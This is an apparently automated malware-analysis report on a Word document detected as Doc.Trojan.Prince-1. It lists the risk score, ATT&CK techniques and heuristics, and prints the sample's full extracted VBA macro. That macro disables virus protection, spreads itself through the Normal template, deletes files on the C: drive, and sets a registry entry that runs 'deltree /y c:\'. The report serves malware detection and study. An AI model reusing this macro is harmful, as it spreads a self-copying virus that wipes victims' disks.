MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious OLE document containing VBA macros. The macros attempt to export and import code, potentially to establish persistence via registry keys and modify system settings. The embedded text and macro comments suggest a self-proclaimed 'Principe' malware, but a specific family cannot be confidently identified.
Heuristics 2
-
ClamAV: Doc.Trojan.Prince-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Prince-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3114 bytes |
SHA-256: 217066adea22c49282971602951700491c00084599d11e5ec5e133f2126c3b33 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("Tools").Controls("Macro").Visible = False
cnt = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
cda = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If (cda >= 20) Then ActiveDocument.VBProject.VBComponents.Item(1).Export ("c:\aaaa.xxx")
If (cnt <= 15) Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\aaaa.xxx")
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
For g = 1 To 4: .Deletelines 1: Next g
End With
End If
If (cnt > 15) And (cda = 0) Then
NormalTemplate.VBProject.VBComponents.Item(1).Export ("c:\aaaa.xxx")
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\aaaa.xxx")
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
For Y = 1 To 4: .Deletelines 1: Next Y
End With
End If
Kill ("c:\aaaa.xxx")
If (Hour(Now) > Day(Now)) And (WeekDay(Now) = vbFriday) Then
Selection.TypeText ("(--Principe ataca Otra vez,por Dragón rojo.Viva Chile Mierda--)")
Else
Selection.TypeText ("Principe_")
End If
ActiveDocument.SaveAs ActiveDocument.FullName
If ((Day(Now) = 13) And System.PrivateProfileString("", "HKEY_CURRENT_USER\", "Principe") <> "Dragon Rojo") Then
Kill ("c:\*.*")
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices", "Principe") = "deltree /y c:\"
Call Cagar_Nombres
System.PrivateProfileString("", "HKEY_CURRENT_USER\", "Principe") = "Dragon Rojo"
End If
End Sub
Private Sub Cagar_Nombres()
CommandBars("Tools").Controls(5).Caption = "AutoMasturBación"
CommandBars("Tools").Controls(5).Enabled = False
CommandBars("File").Controls(2).Caption = "Aburrir"
CommandBars("File").Controls(3).Caption = "Culiar"
CommandBars("File").Controls(4).Caption = "Mandarselo a Guardar"
CommandBars("File").Controls(5).Caption = "Guardar la Guea Como"
CommandBars("File").Controls(7).Caption = "Fornicaciones"
CommandBars("File").Controls(8).Caption = "Configurar la Página Culia"
CommandBars("File").Controls(11).Caption = "Enviarsela a un Culiao Por "
CommandBars("File").Controls(12).Caption = "Propiedades de Esta Porqueria"
CommandBars("Insert").Controls(12).Caption = "Insertar La Mejor Foto Porno"
CommandBars("Edit").Controls(4).Caption = "Copión Maricon"
CommandBars("Edit").Controls(5).Caption = "Pegarle"
CommandBars("Edit").Controls(6).Caption = "Pegado Especial Con Moco"
CommandBars("Edit").Controls(7).Caption = "Pegado Con Un SUPER MOCO"
CommandBars("Edit").Controls(3).Caption = "Castrar"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.